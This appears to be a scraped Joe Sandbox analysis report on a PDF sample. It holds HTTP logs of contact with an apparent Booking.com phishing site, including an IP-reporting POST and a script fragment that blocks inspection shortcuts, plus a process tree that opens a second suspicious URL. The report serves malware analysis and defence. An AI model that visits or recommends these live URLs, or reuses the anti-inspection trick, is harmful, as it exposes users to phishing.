26 26 20 65 76 65 6e 74 2e 73 68 69 66 74 4b 65 79 20 26 26 20 65 76 65 6e 74 2e 6b 65 79 2e 74 6f 4c 6f 77 Data Ascii: ); document.addEventListener('contextmenu', function(event) { event.preventDefault(); }, false); document.addEventListener('keydown', function(event) { if ((event.ctrlKey \|\| event.metaKey) && event.shiftKey && event.key.toLow

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:25 UTC	629	OUT	GET /backend_static/common/flags/new/48-squared/us.png HTTP/1.1 Host: q-xx.bstatic.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:25 UTC	768	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 642 Connection: close Server: nginx Date: Mon, 06 Jan 2025 04:05:32 GMT Last-Modified: Mon, 07 Sep 2020 09:08:23 GMT ETag: "5f55f887-282" Expires: Wed, 05 Feb 2025 04:05:32 GMT Cache-Control: max-age=2592000 access-control-allow-origin: * nel: {"report_to":"default","max_age":600} report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05} Accept-Ranges: bytes x-xss-protection: 1; mode=block timing-allow-origin: * X-Cache: Hit from cloudfront Via: 1.1 b5baf61905dac15e74c27872e28ce3ae.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P8 X-Amz-Cf-Id: QcRMf6JDfbusT40cNRnaB33-P-znqdsZ26nb3BrQz63mt8ZivjrWSQ== Age: 907853
2025-01-16 16:16:25 UTC	642	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 00 75 50 4c 54 45 b4 1f 30 3c 39 70 b4 1f 30 97 27 40 ff ff ff b4 1f 30 3c 3a 70 d0 73 7d 54 53 82 ec c7 cb e3 ab b1 61 5f 8b 48 46 79 6d 6b 94 49 46 79 be 3b 49 91 90 ae c2 c2 d2 79 78 9c 85 84 a6 48 47 79 9d 9c b7 aa a9 c0 b6 b5 c9 c7 57 64 f3 f3 f6 db da e4 ce cd db 96 26 40 e7 e7 ed 6d 6b 93 9e 9d b7 ce ce db a1 47 5e b5 b5 c9 9e 9c b8 c0 a4 b4 b7 87 9a ae 6c 81 d6 1f 19 b1 00 00 00 04 74 52 4e 53 df bf bf bf 3b 25 6a 12 00 00 01 b8 49 44 41 54 48 c7 8c d4 61 93 94 30 0c 06 60 d4 f5 35 9a 14 4b 69 41 38 d9 dd bb 53 ff ff 4f b4 79 b9 b9 ce c0 ce 68 3e 3c d3 81 09 34 a4 a1 fb f0 1f f1 e9 63 8b 0e 30 83 87 50 6d eb 76 e5 e7 e7 16 1d fa 69 10 bc 89 69 Data Ascii: PNGIHDR00`uPLTE0<9p0'@0<:ps}TSa_HFymkIFy;IyxHGyWd&@mkG^ltRNS;%jIDATHa0`5KiA8SOyh><4c0Pmvii

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:25 UTC	596	OUT	GET /favicon.ico HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:25 UTC	946	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:25 GMT Content-Type: image/x-icon Content-Length: 610 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"262-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cdmGMZ1sXcp8b6t7vtbSt5pDbHMwBXO4MMjV2l3r3AUfy1sHBPVw7FZWA%2FHMHBAvkxi%2B%2BM5ab8cLjzr7outtiXrAn0A0cIs9VZ1NmqF2XIPn%2FL0aXXIVR3Dt%2F2MHC%2BJNlBpNq5Pvww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f68effbc5ab45-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14213&min_rtt=14188&rtt_var=5371&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1174&delivery_rate=202918&cwnd=32&unsent_bytes=0&cid=8db21d8ed227d622&ts=415&x=0"
2025-01-16 16:16:25 UTC	423	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 29 49 44 41 54 58 85 d5 97 3f 4c 1a 61 18 c6 7f 77 31 b0 1c 82 c9 0d 12 13 4b 53 89 9d 5a 18 ba 68 4d 8c 5d a4 8b ba d0 c1 10 b1 63 5d ba 52 17 16 db b9 31 76 a3 68 4c 17 bb c0 74 53 5b 5b aa 8b 83 d0 cd 48 83 31 69 5d 18 6c 64 b1 21 b1 03 70 70 78 fc b9 e3 e0 d2 67 e3 7b 73 f7 fc ee 7d bf ef 21 9f 40 4d d3 5b e3 c0 2e 30 05 0c d1 1f 95 81 43 20 c2 c1 da 39 80 50 35 0f 03 1f fa 68 ac 07 b2 cc c1 da 9e 50 fd f2 9f 03 34 6f 84 b8 27 52 69 fb a0 cd a9 7a ee 8a 54 66 6e 97 a6 44 ec f9 fa 9a 86 ba 32 f7 79 5d f8 46 87 35 6b fb c7 bf ac 21 e8 c6 3c 9b 7c 86 5b 72 e8 d6 d3 99 02 f1 f7 47 64 4f 8b a6 00 c4 76 45 8f e4 24 f5 26 d4 d2 1c 60 61 e6 2e fb 9b 8b Data Ascii: PNGIHDR szz)IDATX?Law1KSZhM]c]R1vhLtS[[H1i]ld!ppxg{s}!@M[.0C 9P5hP4o'RizTfnD2y]F5k!<\|[rGdOvE$&`a.
2025-01-16 16:16:25 UTC	187	IN	Data Raw: 61 00 43 23 68 de 64 d9 d3 a2 a6 23 66 d2 b0 e7 3d e0 69 13 d3 01 bf dc 71 6f 98 fe 2b f6 48 4e a2 4f ef 6b a2 3a db 90 8c db eb 4f d4 13 b3 a3 9c 10 dd f8 a4 fb 1e 81 e9 ad 9b 56 26 b3 c1 31 be 6c 2e 74 0d b5 14 53 48 65 0a 00 dc 7c 7f a1 a9 05 57 f7 74 73 c2 b2 63 b8 a3 9c a8 e6 7a 6a 95 92 3d 03 a4 33 05 96 62 ca ad 16 af be ae 07 d3 db 8f 3f 38 bb b8 d2 7d be ed 08 06 21 cb 46 f0 5f 03 94 6d f4 2f 8b 54 ee 6a 76 e9 50 04 22 d8 d3 85 32 10 11 ab b7 d4 e5 01 43 d4 2e a7 e7 82 ba 64 d3 f5 fc 1f 98 86 a2 c4 41 31 cb af 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: aC#hd#f=iqo+HNOk:OV&1l.tSHe\|Wtsczj=3b?8}!F_m/TjvP"2C.dA1IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:26 UTC	389	OUT	GET /backend_static/common/flags/new/48-squared/us.png HTTP/1.1 Host: q-xx.bstatic.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:26 UTC	768	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 642 Connection: close Server: nginx Date: Mon, 06 Jan 2025 04:05:32 GMT Last-Modified: Mon, 07 Sep 2020 09:08:23 GMT ETag: "5f55f887-282" Expires: Wed, 05 Feb 2025 04:05:32 GMT Cache-Control: max-age=2592000 access-control-allow-origin: * nel: {"report_to":"default","max_age":600} report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":600,"group":"default","failure_fraction":0.05} Accept-Ranges: bytes x-xss-protection: 1; mode=block timing-allow-origin: * X-Cache: Hit from cloudfront Via: 1.1 b0723c68cc136f4e89ad2f6a85c82e12.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P8 X-Amz-Cf-Id: BUgkaS2pjjdDuKdlRTDvlEglWEozqT7odY-6KJZJeyihgwJDuyeiww== Age: 907854
2025-01-16 16:16:26 UTC	642	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 00 75 50 4c 54 45 b4 1f 30 3c 39 70 b4 1f 30 97 27 40 ff ff ff b4 1f 30 3c 3a 70 d0 73 7d 54 53 82 ec c7 cb e3 ab b1 61 5f 8b 48 46 79 6d 6b 94 49 46 79 be 3b 49 91 90 ae c2 c2 d2 79 78 9c 85 84 a6 48 47 79 9d 9c b7 aa a9 c0 b6 b5 c9 c7 57 64 f3 f3 f6 db da e4 ce cd db 96 26 40 e7 e7 ed 6d 6b 93 9e 9d b7 ce ce db a1 47 5e b5 b5 c9 9e 9c b8 c0 a4 b4 b7 87 9a ae 6c 81 d6 1f 19 b1 00 00 00 04 74 52 4e 53 df bf bf bf 3b 25 6a 12 00 00 01 b8 49 44 41 54 48 c7 8c d4 61 93 94 30 0c 06 60 d4 f5 35 9a 14 4b 69 41 38 d9 dd bb 53 ff ff 4f b4 79 b9 b9 ce c0 ce 68 3e 3c d3 81 09 34 a4 a1 fb f0 1f f1 e9 63 8b 0e 30 83 87 50 6d eb 76 e5 e7 e7 16 1d fa 69 10 bc 89 69 Data Ascii: PNGIHDR00`uPLTE0<9p0'@0<:ps}TSa_HFymkIFy;IyxHGyWd&@mkG^ltRNS;%jIDATHa0`5KiA8SOyh><4c0Pmvii

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:26 UTC	355	OUT	GET /favicon.ico HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:27 UTC	941	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:27 GMT Content-Type: image/x-icon Content-Length: 610 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"262-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztJNlfJJ1A22xldSaDdGvSxzaBt4imuD1mYyTruLv7E8qYjqbclSkxSfVlvt%2BSIg2nl4FeUMeYz0cj1YoUG36hpIZjotqGbFS15sgk5qrzJ3UyViO%2B4kD%2BFhsg1OawLRP6OfZ1%2FE1w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f68f87c90ebbc-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13761&min_rtt=13755&rtt_var=5171&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=933&delivery_rate=211486&cwnd=32&unsent_bytes=0&cid=9a8c7b5e03cfca9a&ts=272&x=0"
2025-01-16 16:16:27 UTC	428	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 29 49 44 41 54 58 85 d5 97 3f 4c 1a 61 18 c6 7f 77 31 b0 1c 82 c9 0d 12 13 4b 53 89 9d 5a 18 ba 68 4d 8c 5d a4 8b ba d0 c1 10 b1 63 5d ba 52 17 16 db b9 31 76 a3 68 4c 17 bb c0 74 53 5b 5b aa 8b 83 d0 cd 48 83 31 69 5d 18 6c 64 b1 21 b1 03 70 70 78 fc b9 e3 e0 d2 67 e3 7b 73 f7 fc ee 7d bf ef 21 9f 40 4d d3 5b e3 c0 2e 30 05 0c d1 1f 95 81 43 20 c2 c1 da 39 80 50 35 0f 03 1f fa 68 ac 07 b2 cc c1 da 9e 50 fd f2 9f 03 34 6f 84 b8 27 52 69 fb a0 cd a9 7a ee 8a 54 66 6e 97 a6 44 ec f9 fa 9a 86 ba 32 f7 79 5d f8 46 87 35 6b fb c7 bf ac 21 e8 c6 3c 9b 7c 86 5b 72 e8 d6 d3 99 02 f1 f7 47 64 4f 8b a6 00 c4 76 45 8f e4 24 f5 26 d4 d2 1c 60 61 e6 2e fb 9b 8b Data Ascii: PNGIHDR szz)IDATX?Law1KSZhM]c]R1vhLtS[[H1i]ld!ppxg{s}!@M[.0C 9P5hP4o'RizTfnD2y]F5k!<\|[rGdOvE$&`a.
2025-01-16 16:16:27 UTC	182	IN	Data Raw: de 64 d9 d3 a2 a6 23 66 d2 b0 e7 3d e0 69 13 d3 01 bf dc 71 6f 98 fe 2b f6 48 4e a2 4f ef 6b a2 3a db 90 8c db eb 4f d4 13 b3 a3 9c 10 dd f8 a4 fb 1e 81 e9 ad 9b 56 26 b3 c1 31 be 6c 2e 74 0d b5 14 53 48 65 0a 00 dc 7c 7f a1 a9 05 57 f7 74 73 c2 b2 63 b8 a3 9c a8 e6 7a 6a 95 92 3d 03 a4 33 05 96 62 ca ad 16 af be ae 07 d3 db 8f 3f 38 bb b8 d2 7d be ed 08 06 21 cb 46 f0 5f 03 94 6d f4 2f 8b 54 ee 6a 76 e9 50 04 22 d8 d3 85 32 10 11 ab b7 d4 e5 01 43 d4 2e a7 e7 82 ba 64 d3 f5 fc 1f 98 86 a2 c4 41 31 cb af 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: d#f=iqo+HNOk:OV&1l.tSHe\|Wtsczj=3b?8}!F_m/TjvP"2C.dA1IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:17:36 UTC	586	OUT	POST /send-ip HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://fixecondfirbook.info Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:17:36 UTC	826	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:17:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0vSSenixZfdMsCYN%2B%2BmUzHuxMfq7q0mTFDKs08l%2FsrnTYonCErp5cb2zrLku%2B2AfmkqUYTX1%2F4XXWb2NzGk3yMiX2rLRWX3S5gKWTgsQBpzuOhprd1e%2FHKlmKGi6YGbA8oxZzLPHBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6aa9282b7fbe-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7158&min_rtt=7147&rtt_var=2703&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1164&delivery_rate=403259&cwnd=32&unsent_bytes=0&cid=ab1f43e7e4a93eb0&ts=761&x=0"
2025-01-16 16:17:36 UTC	27	IN	Data Raw: 31 35 0d 0a 49 50 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd 0d 0a Data Ascii: 15IP
2025-01-16 16:17:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shJGPJRkwH.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Errors

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\fac63316-e3da-47a4-a0bf-25e82d1aa1c3.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250116161556Z-245.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Windows Analysis Report
shJGPJRkwH.pdf

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:17:37 UTC	351	OUT	GET /send-ip HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:17:38 UTC	906	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 16:17:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhZvlsXb8cBwtXwAKke%2BLKPkPlfPIVqN7mEmxotuSzdOTPYuqz4v5t0vw5LqedK2hnO9mrrA396hZBM4UzngHbIedsFAX8AlwOFD53x8%2B65LHWH3WR0oH5uQZrBE3wriXdD1zUen6Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6ab45a19ab12-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13917&min_rtt=13901&rtt_var=5245&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=929&delivery_rate=208125&cwnd=32&unsent_bytes=0&cid=7b080a847504fd3a&ts=374&x=0"
2025-01-16 16:17:38 UTC	152	IN	Data Raw: 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 73 65 6e 64 2d 69 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 92<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /send-ip</pre></body></html>
2025-01-16 16:17:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:17:38 UTC	551	OUT	OPTIONS /report/v4?s=%2FhZvlsXb8cBwtXwAKke%2BLKPkPlfPIVqN7mEmxotuSzdOTPYuqz4v5t0vw5LqedK2hnO9mrrA396hZBM4UzngHbIedsFAX8AlwOFD53x8%2B65LHWH3WR0oH5uQZrBE3wriXdD1zUen6Q%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://fixecondfirbook.info Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:17:38 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Thu, 16 Jan 2025 16:17:38 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:17:39 UTC	488	OUT	POST /report/v4?s=%2FhZvlsXb8cBwtXwAKke%2BLKPkPlfPIVqN7mEmxotuSzdOTPYuqz4v5t0vw5LqedK2hnO9mrrA396hZBM4UzngHbIedsFAX8AlwOFD53x8%2B65LHWH3WR0oH5uQZrBE3wriXdD1zUen6Q%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 398 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:17:39 UTC	398	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 37 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 34 2e 31 39 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 78 65 63 6f 6e 64 66 69 72 62 6f 6f 6b Data Ascii: [{"age":0,"body":{"elapsed_time":1373,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.94.195","status_code":404,"type":"http.error"},"type":"network-error","url":"https://fixecondfirbook
2025-01-16 16:17:39 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Thu, 16 Jan 2025 16:17:39 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	1
Start time:	11:15:48
Start date:	16/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\shJGPJRkwH.pdf"
Imagebase:	0x7ff702560000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	11:15:50
Start date:	16/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	11:15:51
Start date:	16/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2148 --field-trial-handle=1508,i,12047917609770271542,12989106343411869346,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	11:16:14
Start date:	16/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://clintonmakes.com/215c/#mrzltabnxnf1v7h1hxqcxp"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
